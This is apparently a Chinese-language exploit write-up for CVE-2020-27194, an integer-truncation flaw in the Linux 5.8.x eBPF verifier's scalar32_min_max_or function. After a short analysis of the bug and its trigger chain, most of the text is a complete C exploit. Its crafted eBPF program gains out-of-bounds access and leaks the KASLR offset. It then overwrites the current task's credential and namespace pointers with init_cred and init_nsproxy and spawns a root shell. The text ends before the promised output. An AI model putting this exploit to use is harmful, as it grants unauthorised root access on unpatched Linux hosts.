前言
影响版本:5.8.x
内核分支,v5.8.15
以及更低的版本
编译选项:CONFIG_BPF_SYSCALL
以及 .config 中
所有带 BPF
字样的编译选项
漏洞概述:eBPF
验证程序中进行 or
操作时,scalar32_min_max_or
函数将 64 位的值赋值到 32 位的变量上,导致整数截断,进而错误计算了寄存器的范围,从而绕过bpf
的检查,导致越界读写
测试环境:linux-5.8.14
该漏洞利用与之前分析的 CVE-2020-8835 几乎一模一样,所以比起该漏洞,漏洞发现者提出的 fuzz
思路更加有价值。当然笔者目前还没有开始学习 fuzz
,暂时不谈。
漏洞分析与利用
根据 patch 可知漏洞发生在 scalar32_min_max_or
函数中:
/*
 * Quoted from kernel/bpf/verifier.c (v5.8.14) — the vulnerable function
 * behind CVE-2020-27194.  It recomputes the 32-bit (subregister) bounds of
 * dst_reg after a BPF_OR, but copies 64-bit bound fields into 32-bit
 * variables/fields, silently truncating them and corrupting the verifier's
 * range tracking (see the BUG comments below).
 */
static void scalar32_min_max_or(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
    bool src_known = tnum_subreg_is_const(src_reg->var_off); // are the low 32 bits of src_reg a known constant?
    bool dst_known = tnum_subreg_is_const(dst_reg->var_off); // are the low 32 bits of dst_reg a known constant?
    struct tnum var32_off = tnum_subreg(dst_reg->var_off); // low 32 bits of dst_reg
    s32 smin_val = src_reg->smin_value; // BUG: 64-bit smin_value truncated into s32
    u32 umin_val = src_reg->umin_value; // 64-bit umin_value truncated into u32
    /* Assuming scalar64_min_max_or will be called so it is safe
     * to skip updating register for known case.
     */
    if (src_known && dst_known)
        return;
    /* We get our maximum from the var_off, and our minimum is the
     * maximum of the operands' minima
     */
    dst_reg->u32_min_value = max(dst_reg->u32_min_value, umin_val);
    dst_reg->u32_max_value = var32_off.value | var32_off.mask;
    if (dst_reg->s32_min_value < 0 || smin_val < 0) {
        /* Lose signed bounds when ORing negative numbers,
         * ain't nobody got time for that.
         */
        dst_reg->s32_min_value = S32_MIN;
        dst_reg->s32_max_value = S32_MAX;
    } else {
        /* ORing two positives gives a positive, so safe to
         * cast result into s64.
         */
        /* BUG (CVE-2020-27194): the 64-bit umin_value/umax_value are
         * truncated into the 32-bit signed bounds, so the verifier's view
         * of the register's range no longer matches reality, letting a
         * crafted program smuggle an out-of-range value past the checks. */
        dst_reg->s32_min_value = dst_reg->umin_value;
        dst_reg->s32_max_value = dst_reg->umax_value;
    }
}
可以看到在 if-else
分支的 else
分支中,直接将 dst_reg->umin_value/umax_value
赋值给了 dst_reg->s32_min_value/max_value
,这里导致了整数截断,与 CVE-2020-8835
如出一辙。
漏洞触发链:
bpf_check
do_check_main
do_check_common
do_check
check_alu_op
adjust_reg_min_max_vals
adjust_scalar_min_max_vals
scalar32_min_max_or
想要成功执行到漏洞 else
分支,我们需要满足 dst_reg->s32_min_value >= 0
,否则就会走 if
分支直接设置 dst_reg->s32_min_value/max_value
为 S32_MIN/MAX
。
这里我使用的是 JSGE
去设置 dst_reg->min_value = 1
:
/*
 * Quoted from the verifier's branch-bounds refinement: after a signed
 * conditional jump, the taken/not-taken register copies get tightened
 * signed bounds.  The exploit uses the 64-bit BPF_JSGE form
 * (is_jmp32 == false) to raise smin_value to 1.
 */
case BPF_JSGE:
case BPF_JSGT:
{
    if (is_jmp32) {
        /* 32-bit compare: refine the s32 subregister bounds. */
        s32 false_smax = opcode == BPF_JSGT ? sval32 : sval32 - 1;
        s32 true_smin = opcode == BPF_JSGT ? sval32 + 1 : sval32;
        false_reg->s32_max_value = min(false_reg->s32_max_value, false_smax);
        true_reg->s32_min_value = max(true_reg->s32_min_value, true_smin);
    } else {
        /* 64-bit compare: refine the full signed bounds. */
        s64 false_smax = opcode == BPF_JSGT ? sval : sval - 1;
        s64 true_smin = opcode == BPF_JSGT ? sval + 1 : sval;
        false_reg->smax_value = min(false_reg->smax_value, false_smax);
        true_reg->smin_value = max(true_reg->smin_value, true_smin);
    }
    break;
}
然后会执行 __reg_combine_64_into_32
函数:
/*
 * Quoted from kernel/bpf/verifier.c: re-derive the 32-bit bounds of a
 * register from its 64-bit bounds.  Because the 64-bit bounds were
 * tightened first (smin_value = 1 via the BPF_JSGE above), this is what
 * propagates s32_min_value = 1 into the subregister state before the
 * vulnerable scalar32_min_max_or() runs.
 */
static void __reg_combine_64_into_32(struct bpf_reg_state *reg)
{
    __mark_reg32_unbounded(reg);
    if (__reg64_bound_s32(reg->smin_value))
        reg->s32_min_value = (s32)reg->smin_value;
    if (__reg64_bound_s32(reg->smax_value))
        reg->s32_max_value = (s32)reg->smax_value;
    if (__reg64_bound_u32(reg->umin_value))
        reg->u32_min_value = (u32)reg->umin_value;
    if (__reg64_bound_u32(reg->umax_value))
        reg->u32_max_value = (u32)reg->umax_value;
    /* Intersecting with the old var_off might have improved our bounds
     * slightly. e.g. if umax was 0x7f...f and var_off was (0; 0xf...fc),
     * then new var_off is (0; 0x7f...fc) which improves our umax.
     */
    __reg_deduce_bounds(reg);
    __reg_bound_offset(reg);
    __update_reg_bounds(reg);
}
可以看到这里会执行 reg->s32_min_value = (s32)reg->smin_value = 1
后面的利用就不多说了,详细见 CVE-2020-8835
,exp
如下:
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <ctype.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/bpf.h>
#include "bpf_insn.h"
/* Print a red error banner naming the failing step, pause so the message
 * is visible, then terminate the process with a failure status. */
void err_exit(char *msg)
{
    fputs("\033[31m\033[1m[x] Error at: \033[0m", stdout);
    fputs(msg, stdout);
    fputs("\n", stdout);
    sleep(2);
    exit(EXIT_FAILURE);
}
/* Print a magenta informational status line. */
void info(char *msg)
{
    fputs("\033[35m\033[1m[+] ", stdout);
    fputs(msg, stdout);
    fputs("\n\033[0m", stdout);
}
/* Print a green "name: 0x..." line for a leaked/derived value. */
void hexx(char *msg, size_t value)
{
    printf("%s%s: %s%#lx\n", "\033[32m\033[1m[+] ", msg, "\033[0m", value);
}
/*
 * Debug helper: hex + ASCII dump of `len` bytes at `addr`.
 * Layout: one row per four 64-bit words, prefixed by the row's byte
 * offset, followed by the row's printable-ASCII rendering.  Assumes the
 * buffer is 8-byte readable; a tail shorter than 8 bytes is not printed.
 */
void binary_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("\033[33m[*] %s:\n\033[0m", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {      /* i indexes 64-bit words, 4 per row */
        printf(" %04x", i * 8);                 /* byte offset of this row */
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
        }
        printf(" ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}
/* Verify we are root (uid 0) and, if so, spawn an interactive shell;
 * otherwise report failure and exit. */
void get_root_shell(void)
{
    if (getuid() != 0) {
        puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
        sleep(2);
        exit(EXIT_FAILURE);
    }

    puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
    puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");
    system("/bin/sh");

    /* Exit cleanly after the shell returns rather than risking a
     * segmentation fault in the corrupted process. */
    exit(EXIT_SUCCESS);
}
/* Pin the calling process to CPU `core` so the exploit's kernel-side
 * state stays on one CPU.  Failure is reported but non-fatal. */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    /* Original ignored the return value; surface a failure instead of
     * silently continuing unpinned. */
    if (sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set) < 0)
        perror("sched_setaffinity");
    printf("\033[34m\033[1m[*] Process bound to core \033[0m%d\n", core);
}
/* Thin wrapper around the bpf(2) syscall. */
static inline int bpf(int cmd, union bpf_attr *attr)
{
    long ret = syscall(__NR_bpf, cmd, attr, sizeof(*attr));
    return (int)ret;
}
/* Wrapper for BPF_MAP_CREATE; returns the new map fd or a negative error. */
static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,
               unsigned int value_size, unsigned int max_entries)
{
    union bpf_attr attr;

    memset(&attr, 0, sizeof(attr));
    attr.map_type = map_type;
    attr.key_size = key_size;
    attr.value_size = value_size;
    attr.max_entries = max_entries;
    return bpf(BPF_MAP_CREATE, &attr);
}
/* Wrapper for BPF_MAP_LOOKUP_ELEM: copy the value at *key into *value. */
static __always_inline int
bpf_map_lookup_elem(int map_fd, const void* key, void* value)
{
    union bpf_attr attr;

    memset(&attr, 0, sizeof(attr));
    attr.map_fd = map_fd;
    attr.key = (uint64_t)key;
    attr.value = (uint64_t)value;
    return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}
/* Wrapper for BPF_MAP_UPDATE_ELEM: store *value at *key with `flags`
 * (BPF_ANY / BPF_NOEXIST / BPF_EXIST). */
static __always_inline int
bpf_map_update_elem(int map_fd, const void* key, const void* value, uint64_t flags)
{
    union bpf_attr attr;

    memset(&attr, 0, sizeof(attr));
    attr.map_fd = map_fd;
    attr.key = (uint64_t)key;
    attr.value = (uint64_t)value;
    attr.flags = flags;
    return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}
/* Wrapper for BPF_MAP_DELETE_ELEM: remove the entry at *key. */
static __always_inline int
bpf_map_delete_elem(int map_fd, const void* key)
{
    union bpf_attr attr;

    memset(&attr, 0, sizeof(attr));
    attr.map_fd = map_fd;
    attr.key = (uint64_t)key;
    return bpf(BPF_MAP_DELETE_ELEM, &attr);
}
/* Wrapper for BPF_MAP_GET_NEXT_KEY: iterate map keys. */
static __always_inline int
bpf_map_get_next_key(int map_fd, const void* key, void* next_key)
{
    union bpf_attr attr;

    memset(&attr, 0, sizeof(attr));
    attr.map_fd = map_fd;
    attr.key = (uint64_t)key;
    attr.next_key = (uint64_t)next_key;
    return bpf(BPF_MAP_GET_NEXT_KEY, &attr);
}
/*
 * Fetch the kernel's bpf_map_info for `map_fd` and return its btf_id
 * field — the exploit's 4-byte read channel (the eBPF program redirects
 * the map's btf pointer so btf_id overlaps attacker-chosen memory).
 */
static __always_inline uint32_t
bpf_map_get_info_by_fd(int map_fd)
{
    struct bpf_map_info info;
    union bpf_attr attr = {
        .info.bpf_fd = map_fd,
        .info.info_len = sizeof(info),
        .info.info = (uint64_t)&info,
    };

    /* Original read `info.btf_id` uninitialized when the syscall failed
     * (undefined behavior / garbage leak value); zero it and surface the
     * error instead. */
    memset(&info, 0, sizeof(info));
    if (bpf(BPF_OBJ_GET_INFO_BY_FD, &attr) < 0)
        perror("BPF_OBJ_GET_INFO_BY_FD");
    return info.btf_id;
}
/* ---- exploit state (file scope) ---- */
int sockets[2];    /* socketpair; writing sockets[0] runs the attached filter */
int map_fd;        /* victim BPF array map */
int expmap_fd;     /* map whose bpf_map struct gets corrupted */
int prog_fd;
uint32_t key;      /* always key 0 */
uint64_t* value1;  /* staging buffer for map_fd values (control block) */
uint64_t* value2;  /* staging buffer for expmap_fd values */
/* Pre-KASLR addresses from the test kernel's symbol table ("D" = data
 * symbol in nm/kallsyms output); the leaked slide (koffset) is added
 * to them later.  Build-specific: regenerate for any other kernel. */
uint64_t array_map_ops = 0xffffffff8226ea00;
uint64_t init_cred = 0xffffffff82c952c0; // D init_cred
uint64_t init_task = 0xffffffff82c160c0; // D init_task
uint64_t init_nsproxy = 0xffffffff82c94fe0; // D init_nsproxy
uint64_t map_addr = -1;  /* kernel address of expmap's bpf_map, once leaked */
uint64_t koffset = -1;   /* KASLR slide; (uint64_t)-1 means "not found yet" */
uint64_t kbase = -1;     /* relocated kernel text base */
uint64_t tag = 0x6159617a6f616958; /* "XiaozaYa" — comm set in prep(), used to find our task */
uint64_t current_task;   /* our task_struct, found by leak() */
/*
 * The malicious eBPF program.  It abuses CVE-2020-27194: after the
 * JGE/JSGE/JLE sequence the verifier believes r6's 32-bit range is
 * narrower than it really is, so the OR/AND/RSH/MUL chain lets a runtime
 * value of 0x110 pass verification as if it were 0, giving an
 * out-of-bounds pointer into expmap's bpf_map header.
 * NOTE(review): the BPF_LD_MAP_FD operands hardcode fds 3 and 4 — they
 * must match map_fd/expmap_fd as created in prep().
 */
struct bpf_insn prog[] = {
    BPF_LD_MAP_FD(BPF_REG_1, 3), // r1 = [map_fd] = bpf_map ptr1
    BPF_MOV64_IMM(BPF_REG_6, 0), // r6 = 0
    BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_6, -8), // *(u64*)(fp -8) = 0
    BPF_MOV64_REG(BPF_REG_7, BPF_REG_10), // r7 = fp
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, -8), // r7 = fp - 8
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_7), // r2 = r7 = fp - 8
    BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // args: r1 = bpf_map ptr1, r2 = fp - 8
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), // if r0 != 0 goto pc+1
    BPF_EXIT_INSN(), // exit
    BPF_MOV64_REG(BPF_REG_9, BPF_REG_0), // r9 = r0 = value_buf1 ptr
    BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_9, 0), // r6 = value_buf1[0]
    BPF_MOV64_IMM(BPF_REG_0, 0), // r0 = 0
    BPF_JMP_IMM(BPF_JGE, BPF_REG_6, 1, 1), // inc r6.umin_value ==> r6.umin_value = 1
    BPF_EXIT_INSN(), // exit
    BPF_JMP_IMM(BPF_JSGE, BPF_REG_6, 1, 1), // inc r6.smin_value ==> r6.smin_value = 1
    BPF_EXIT_INSN(), // exit
    BPF_MOV64_IMM(BPF_REG_8, 1), // r8 = 1
    BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32), // r8 = 1 << 32 = 0x1 0000 0000
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 1), // r8 = 0x1 0000 0001
    BPF_JMP_REG(BPF_JLE, BPF_REG_6, BPF_REG_8, 1), // r6.umax_value = 0x1 0000 0001
    BPF_EXIT_INSN(), // exit
    BPF_ALU64_IMM(BPF_OR, BPF_REG_6, 0), // r6 or 0 -- triggers the scalar32_min_max_or truncation
    BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 2), // r6 = r6 & 2 = 2 & 2 = 2 (verifier believes 0)
    BPF_ALU64_IMM(BPF_RSH, BPF_REG_6, 1), // r6 = r6 >> 1 = 2 >> 1 = 1
    BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110), // r6 = r6 * 0x110 = 1 * 0x110 = 0x110
    BPF_LD_MAP_FD(BPF_REG_1, 4), // r1 = [expmap_fd] = bpf_map ptr2
    BPF_MOV64_IMM(BPF_REG_8, 0), // r8 = 0
    BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_8, -8), // *(uint64_t*)(fp - 8) = r8 = 0
    BPF_MOV64_REG(BPF_REG_7, BPF_REG_10), // r7 = r10 = fp
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, -8), // r7 = r7 - 8 = fp - 8
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_7), // r2 = r7 = fp - 8
    BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // args: r1 = bpf_map ptr2, r2 = fp - 8
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), // if r0 != 0 goto pc+1
    BPF_EXIT_INSN(), // exit
    BPF_MOV64_REG(BPF_REG_7, BPF_REG_0), // r7 = r0 = value_buf2 addr
    BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6), // r7 = r7 - r6 = value_buf2 addr - 0x110 (OOB: inside bpf_map header)
    BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0), // r8 = *(uint64_t*)r7 = value_buf2[-0x110/8] = array_map_ops
    BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_8, 0x18), // *(uint64_t*)(r9 +0x18) = value_buf1[3] = r8 = array_map_ops
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_8), // r2 = r8 = array_map_ops
    BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0xc0), // r8 = *(uint64_t*)(r7 +0xc0) = value_buf2[-(0x110-0xc0)/8] = map_addr
    BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_8, 0x20), // *(uint64_t*)(r9 +0x20) = value_buf1[4] = r8 = map_addr
    BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_9, 8), // r8 = *(uint64_t*)(r9 +8) = value_buf1[1] = arb_read addr
    BPF_JMP_IMM(BPF_JEQ, BPF_REG_8, 0, 1), // if arb_read addr == NULL goto pc+1
    BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0x40), // *(uint64_t*)(r7 +0x40) = value_buf2[-(0x110-0x40)/8] = btf = r8
    BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_9, 0x10), // r8 = value_buf1[2] = fake_ops
    BPF_JMP_IMM(BPF_JEQ, BPF_REG_8, 0, 4), // if arb_write flag == 0 goto pc+4
    BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), // expmap's bpf_map_ops = r8 = fake_ops
    BPF_ST_MEM(BPF_W, BPF_REG_7, 0x18, BPF_MAP_TYPE_STACK), // map_type = BPF_MAP_TYPE_STACK
    BPF_ST_MEM(BPF_W, BPF_REG_7, 0x24, -1), // max_entries = -1
    BPF_ST_MEM(BPF_W, BPF_REG_7, 0x2c, 0), // spin_lock_off = 0
    BPF_ALU64_IMM(BPF_MOV, BPF_REG_0, 0),
    BPF_EXIT_INSN(),
};
#define BPF_LOG_SZ 0x10000
char bpf_log_buf[BPF_LOG_SZ] = { '\0' };  /* verifier log, dumped on load failure */
/* BPF_PROG_LOAD attributes; log_level = 2 requests a full verifier trace. */
union bpf_attr attr = {
    .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
    .insns = (uint64_t) &prog,
    .insn_cnt = sizeof(prog) / sizeof(prog[0]),
    .license = (uint64_t) "GPL",
    .log_level = 2,
    .log_buf = (uint64_t) bpf_log_buf,
    .log_size = BPF_LOG_SZ,
};
/* Disable stdio buffering on all standard streams so output is not lost
 * if the process dies unexpectedly. */
void init() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);
}
/* Run the attached eBPF filter by sending one datagram over the
 * socketpair; the payload content is irrelevant. */
void trigger() {
    char buffer[64] = { 0 };  /* zeroed: original sent uninitialized stack bytes */
    if (write(sockets[0], buffer, sizeof(buffer)) < 0)
        perror("trigger write");  /* original silently ignored write() failure */
}
/*
 * Set up the exploit: allocate staging buffers, tag our comm, create the
 * two maps, load the malicious program, and attach it to a socketpair.
 * NOTE(review): prog[] hardcodes map fds 3 and 4 (BPF_LD_MAP_FD), so this
 * relies on map_fd/expmap_fd being the first fds allocated after
 * stdin/stdout/stderr — do not open other descriptors before this runs.
 */
void prep() {
    value1 = (uint64_t*)calloc(0x1000, 1);
    value2 = (uint64_t*)calloc(0x1000, 1);
    prctl(PR_SET_NAME, "XiaozaYa");  /* comm tag leak() searches for */
    map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x100, 1);
    if (map_fd < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");
    expmap_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x200, 1);
    if (expmap_fd < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");
    prog_fd = bpf(BPF_PROG_LOAD, &attr);
    if (prog_fd < 0) puts(bpf_log_buf), perror("BPF_PROG_LOAD"), err_exit("BPF_PROG_LOAD");
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) < 0)
        perror("socketpair()"), err_exit("socketpair()");
    if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd)) < 0)
        perror("socketpair SO_ATTACH_BPF"), err_exit("socketpair()");
}
/*
 * Leak 4 bytes of kernel memory at `addr`.
 * value1[0] = 2 steers the eBPF program into its corruption path;
 * value1[1] is planted into expmap's bpf_map at the `btf` slot
 * (see prog[]), offset by -0x58 — presumably so the btf_id field the
 * kernel copies out in BPF_OBJ_GET_INFO_BY_FD overlaps `addr`;
 * TODO confirm against the v5.8 struct btf layout.
 */
uint32_t arb_read_4_byte(uint64_t addr) {
    value1[0] = 2;
    value1[1] = addr - 0x58;
    value1[2] = 0;   /* fake-ops (arb-write) path disabled */
    bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);
    bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);
    trigger();
    return bpf_map_get_info_by_fd(expmap_fd);
}
/* Read a full 64-bit word at `addr` as two 4-byte leaks (low half first,
 * matching the original call order). */
uint64_t arb_read(uint64_t addr) {
    uint64_t halves[2];
    halves[0] = arb_read_4_byte(addr);      /* bits 0..31  */
    halves[1] = arb_read_4_byte(addr + 4);  /* bits 32..63 */
    return (halves[1] << 32) | halves[0];
}
/*
 * Stage 2: copy a fake bpf_map_ops table into expmap's value buffer and
 * have the eBPF program point expmap's ops at it (value1[2] =
 * map_addr + 0x110 + 0x20, i.e. inside value2's in-kernel copy), turning
 * subsequent map updates into the arbitrary-write primitive.
 * The table entries are pre-KASLR function addresses from the test
 * kernel; every populated slot is relocated by the leaked slide first.
 */
void prep_arb_write() {
    /* (original declared an unused 0x200-byte local buffer here) */
    value1[0] = 2;
    value1[1] = 0;                          /* arb-read path disabled */
    value1[2] = map_addr + 0x110 + 0x20;    /* kernel address of fake_ops below */
    uint64_t fake_ops[] = {
        0x0,0x0,0x0,0x0,
        0xffffffff812713a0,
        0xffffffff81272440,
        0x0,
        0xffffffff81271a10,
        0xffffffff81271490,
        0x0,0x0,
        0xffffffff81250c40,
        0x0,
        0xffffffff81250a10,
        0x0,
        0xffffffff81271520,
        0xffffffff81271890,
        0xffffffff81271370,
        0xffffffff81271490,
        0x0,0x0,0x0,0x0,
        0xffffffff81271f50,
        0x0,
        0xffffffff81271630,
        0xffffffff81272250,
        0x0,0x0,0x0,
        0xffffffff81271420,
        0xffffffff81271450,
        0xffffffff812715c0,
        0x0
    };
    /* Apply the KASLR slide to every populated slot (size_t index avoids
     * the original's signed/unsigned comparison). */
    for (size_t i = 0; i < sizeof(fake_ops) / sizeof(fake_ops[0]); i++) {
        if (fake_ops[i]) fake_ops[i] += koffset;
    }
    memcpy(value2, fake_ops, sizeof(fake_ops));
    bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);
    bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);
    trigger();
}
/*
 * Arbitrary 4-byte write primitive (valid only after prep_arb_write()).
 * The eBPF program has forced expmap's map_type to BPF_MAP_TYPE_STACK
 * with max_entries = -1 and faked its ops table, so this "update" runs
 * the stack-map push path with attacker-controlled state; the `flags`
 * argument is abused to carry the destination kernel address.
 * NOTE(review): the stored value is val - 1 — presumably the push path
 * adjusts the value by one before storing; confirm against the v5.8
 * queue/stack map implementation.
 */
void arb_write_4_byte(uint64_t addr, uint32_t val) {
    value2[0] = val - 1;
    bpf_map_update_elem(expmap_fd, &key, value2, addr);  /* flags = addr */
}
/* Write a full 64-bit value at `addr` as two 4-byte stores. */
void arb_write(uint64_t addr, uint64_t val) {
    uint32_t lo = (uint32_t)(val & 0xffffffff);
    uint32_t hi = (uint32_t)((val >> 32) & 0xffffffff);
    arb_write_4_byte(addr, lo);
    arb_write_4_byte(addr + 4, hi);
}
/*
 * Stage 1: run the eBPF program once to leak &array_map_ops and expmap's
 * bpf_map address (the program stores them into value_buf1[3]/[4]),
 * derive the KASLR slide, relocate the symbol-table addresses, then walk
 * the task list from init_task to find our own task_struct (identified
 * by the "XiaozaYa" comm tag set in prep()).
 * NOTE(review): 0xa58 (comm) and 0x7a8/0x7a0 (tasks list links) are
 * task_struct offsets specific to this exact kernel build — confirm
 * against the tested vmlinux before reuse.
 */
void leak() {
    uint64_t buf[0x200/8] = { 0 };
    value1[0] = 2;
    value1[1] = 0;   /* no btf redirect: pure leak pass */
    value1[2] = 0;   /* arb-write path disabled */
    bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);
    bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);
    trigger();
    memset(buf, 0, sizeof(buf));
    bpf_map_lookup_elem(map_fd, &key, buf);
    // binary_dump("LEAK DATA", buf, 0x100);
    /* buf[3] = leaked &array_map_ops, buf[4] = leaked bpf_map+0xc0 field;
     * the low-12-bit/upper-half mask sanity-checks the leak before use. */
    if ((buf[3] & 0xffffffff00000fff) == (array_map_ops & 0xffffffff00000fff)) {
        koffset = buf[3] - array_map_ops;
        kbase = 0xffffffff81000000 + koffset;
        map_addr = buf[4] - 0xc0;
        hexx("koffset", koffset);
        hexx("kbase", kbase);
        hexx("map_addr", map_addr);
    }
    if (koffset == -1) err_exit("FAILED to leak kernel base");
    /* Relocate the pre-KASLR symbol addresses by the slide. */
    array_map_ops += koffset;
    init_cred += koffset;
    init_task += koffset;
    init_nsproxy += koffset;
    hexx("init_cred", init_cred);
    hexx("init_task", init_task);
    hexx("init_nsproxy", init_nsproxy);
    current_task = init_task;
    for (;;) {
        if (arb_read(current_task+0xa58) == tag) {
            break;
        }
        current_task = arb_read(current_task + 0x7a8) - 0x7a0;
    }
    hexx("current_task", current_task);
}
/*
 * Exploit driver: leak the KASLR slide, build the arbitrary-write
 * primitive, overwrite the current task's credential/namespace pointers
 * with the init_* kernel objects, then spawn a root shell.
 */
int main(int argc, char** argv, char** envp)
{
    init();
    prep();
    leak();
    prep_arb_write();

    /* Patch the fields at current_task+0xa40/0xa48 (presumably
     * real_cred/cred) to &init_cred and +0xaa8 (presumably nsproxy) to
     * &init_nsproxy.  Each pointer is written as two overlapping 4-byte
     * stores (base and base+2) covering bits 0..47; the top 16 bits are
     * left as-is — presumably already 0xffff from the old kernel
     * pointer; TODO confirm. */
    arb_write_4_byte(current_task+0xa48, init_cred&0xffffffff);
    arb_write_4_byte(current_task+0xa48+2, (init_cred>>16)&0xffffffff);
    arb_write_4_byte(current_task+0xa40, init_cred&0xffffffff);
    arb_write_4_byte(current_task+0xa40+2, (init_cred>>16)&0xffffffff);
    arb_write_4_byte(current_task+0xaa8, init_nsproxy&0xffffffff);
    arb_write_4_byte(current_task+0xaa8+2, (init_nsproxy>>16)&0xffffffff);

    get_root_shell();

    /* Not reached: get_root_shell() always exits. */
    // puts(bpf_log_buf);
    puts("EXP NEVER END!");  /* typo fixed: was "NERVER" */
    return 0;
}
效果如下: